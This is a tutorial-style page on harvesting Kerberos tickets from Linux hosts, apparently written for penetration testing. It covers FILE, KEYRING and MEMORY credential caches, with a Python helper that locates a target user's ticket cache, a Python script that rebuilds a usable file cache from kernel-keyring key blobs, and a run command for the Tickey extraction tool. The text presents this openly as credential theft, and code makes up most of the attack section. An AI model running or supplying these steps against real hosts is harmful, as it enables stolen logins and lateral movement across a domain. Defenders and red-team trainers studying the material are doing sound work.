Harvesting tickets from Linux
Linux systems keep Kerberos credential caches (ccaches) in one of three storage types: FILE (a regular file, by default under /tmp), KEYRING (a keyring in the Linux kernel's key retention service) and MEMORY (held in the memory of the process that acquired the tickets and visible only to that process). The default_ccache_name variable in the [libdefaults] section of /etc/krb5.conf tells you which type a host uses; if it is unset, the compiled-in default is FILE:/tmp/krb5cc_%{uid}. Also check the KRB5CCNAME environment variable of the target process, since it overrides the configured default.
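As an added example (not code from the original page or from any of the tools it mentions), the helper below applies the lookup order just described to work out where a given user's ccache lives: KRB5CCNAME if set, otherwise default_ccache_name from [libdefaults], otherwise the compiled-in FILE:/tmp/krb5cc_%{uid}, with %{uid} and %{username} expanded. The krb5.conf text is constructed for the example and the function names are my own.

```python
import re

# Compiled-in fallback used by MIT krb5 when nothing else is configured.
COMPILED_DEFAULT = "FILE:/tmp/krb5cc_%{uid}"

# Constructed sample krb5.conf (not taken from a real host).
SAMPLE_KRB5_CONF = """
[libdefaults]
    default_realm = EXAMPLE.COM
    # RHEL-style default: tickets live in the kernel keyring
    default_ccache_name = KEYRING:persistent:%{uid}

[realms]
    EXAMPLE.COM = {
        kdc = kdc.example.com
    }
"""


def default_ccache_name(krb5_conf: str):
    """Return default_ccache_name from [libdefaults], or None if it is not set."""
    section = None
    for raw in krb5_conf.splitlines():
        line = re.split(r"[#;]", raw, maxsplit=1)[0].strip()  # drop comments
        if not line:
            continue
        m = re.fullmatch(r"\[(\w+)\]", line)
        if m:
            section = m.group(1)
            continue
        if section == "libdefaults" and "=" in line:
            key, _, value = line.partition("=")
            if key.strip() == "default_ccache_name":
                return value.strip()
    return None


def resolve_ccache(krb5_conf: str, uid: int, username: str, env: dict):
    """Apply krb5's lookup order and return (type, residual, full name).

    Order: KRB5CCNAME in the environment, then default_ccache_name in
    [libdefaults], then the compiled-in FILE default.  %{uid} and %{username}
    are the expansions that matter when locating another user's cache.
    """
    name = env.get("KRB5CCNAME") or default_ccache_name(krb5_conf) or COMPILED_DEFAULT
    name = name.replace("%{uid}", str(uid)).replace("%{username}", username)
    cctype, sep, residual = name.partition(":")
    if not sep:
        # A bare path such as /tmp/krb5cc_1000 is treated as a FILE cache.
        cctype, residual = "FILE", name
    return cctype, residual, name


if __name__ == "__main__":
    # Where would uid 1000's tickets be under the sample config?
    print(resolve_ccache(SAMPLE_KRB5_CONF, 1000, "alice", {}))
    # ...and when the process environment overrides it?
    print(resolve_ccache("", 1000, "alice", {"KRB5CCNAME": "/tmp/krb5cc_1000_abc"}))
```

On a live host, feed it the contents of /etc/krb5.conf and the environment of the target process (from /proc/<pid>/environ), then look for the FILE path, the _krb_* keyring, or the process memory accordingly.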
The 2017 paper outlines methods for extracting credentials from keyrings and from process memory, with emphasis on the kernel keyring mechanism that Linux uses to manage and store keys.
Keyring Extraction Overview
The keyctl system call, introduced in kernel version 2.6.10, lets user-space applications interact with kernel keyrings. A KEYRING ccache stores its parts as separate keys (one for the default principal and one per credential), whereas a FILE ccache additionally starts with a header. The hercules.sh script from the paper demonstrates reading those keys and reassembling them into a usable file ccache, which is all that credential theft requires.
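As an added example (my own code, not hercules.sh or anything from the paper), the block below does the reassembly step in Python: it prepends a version 4 file-ccache header to a default principal blob and a list of credential blobs, and can read the principal back to verify the result. It assumes the keyring keys hold the same marshaled principal and credential records that the FILE type writes (so on a real host the blobs would be obtained with `keyctl pipe <key_id>` from the _krb_* keyring); the principal, key, times and ticket bytes used in demo() are constructed, not captured.

```python
import struct

# MIT krb5 FILE ccache, format version 4 (magic 0x0504).
FCC_VERSION_4 = b"\x05\x04"
FCC_TAG_DELTATIME = 1
NT_PRINCIPAL, NT_SRV_INST = 1, 2
ENCTYPE_AES256_CTS_HMAC_SHA1_96 = 18


def _counted(data: bytes) -> bytes:
    """32-bit big-endian length prefix followed by the data."""
    return struct.pack(">I", len(data)) + data


def marshal_principal(name_type: int, realm: str, components) -> bytes:
    """krb5 v4 principal encoding: name_type, component count, realm, components."""
    out = struct.pack(">II", name_type, len(components)) + _counted(realm.encode())
    return out + b"".join(_counted(c.encode()) for c in components)


def unmarshal_principal(buf: bytes, off: int = 0):
    """Inverse of marshal_principal; returns ((name_type, realm, comps), next_offset)."""
    name_type, ncomp = struct.unpack_from(">II", buf, off)
    off += 8
    strings = []
    for _ in range(ncomp + 1):          # realm first, then each component
        (n,) = struct.unpack_from(">I", buf, off)
        off += 4
        strings.append(buf[off:off + n].decode())
        off += n
    return (name_type, strings[0], strings[1:]), off


def marshal_credential(client: bytes, server: bytes, enctype: int, key: bytes,
                       times, ticket_flags: int, ticket: bytes) -> bytes:
    """krb5 v4 credential record with no addresses and no authdata."""
    return (client + server
            + struct.pack(">H", enctype) + _counted(key)   # keyblock
            + struct.pack(">IIII", *times)                 # authtime, starttime, endtime, renew_till
            + b"\x00"                                      # is_skey
            + struct.pack(">I", ticket_flags)
            + struct.pack(">I", 0)                         # address count
            + struct.pack(">I", 0)                         # authdata count
            + _counted(ticket)
            + _counted(b""))                               # second_ticket


def build_file_ccache(default_principal: bytes, credentials) -> bytes:
    """Prepend the v4 file header (the part a keyring does not hold) to the components."""
    fields = struct.pack(">HHii", FCC_TAG_DELTATIME, 8, 0, 0)  # zero KDC time offset
    return (FCC_VERSION_4 + struct.pack(">H", len(fields)) + fields
            + default_principal + b"".join(credentials))


def default_principal_of(ccache: bytes) -> str:
    """Read the default principal back out of a v4 file ccache as a sanity check."""
    if ccache[:2] != FCC_VERSION_4:
        raise ValueError("not a version 4 file ccache")
    (hlen,) = struct.unpack_from(">H", ccache, 2)
    (_, realm, comps), _ = unmarshal_principal(ccache, 4 + hlen)
    return "/".join(comps) + "@" + realm


def demo() -> bytes:
    """Constructed stand-ins for the __krb5_princ__ key and one credential key
    of a _krb_* keyring; real ones would come from `keyctl pipe <key_id>`."""
    client = marshal_principal(NT_PRINCIPAL, "EXAMPLE.COM", ["alice"])
    server = marshal_principal(NT_SRV_INST, "EXAMPLE.COM", ["krbtgt", "EXAMPLE.COM"])
    tgt = marshal_credential(client, server, ENCTYPE_AES256_CTS_HMAC_SHA1_96,
                             b"\x11" * 32,                       # constructed session key
                             (1700000000, 1700000000, 1700036000, 1700604800),
                             0x40E10000,                          # forwardable, renewable, initial, pre-authent
                             b"constructed-ticket-bytes")
    return build_file_ccache(client, [tgt])


if __name__ == "__main__":
    import sys
    blob = demo()
    path = sys.argv[1] if len(sys.argv) > 1 else "/tmp/krb5cc_rebuilt"
    with open(path, "wb") as f:
        f.write(blob)
    print(f"wrote {len(blob)} bytes for {default_principal_of(blob)} to {path}")
```

With real keyring payloads substituted for the constructed ones, the resulting file can be used with KRB5CCNAME=FILE:/tmp/krb5cc_rebuilt klist; the constructed ticket bytes here are obviously not a valid encrypted ticket, so only the structure is meaningful.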
Ticket Extraction Tool: Tickey
Building on the approach of the hercules.sh script, Tickey is a tool written specifically to extract tickets from keyrings. It is run on the target as /tmp/tickey -i.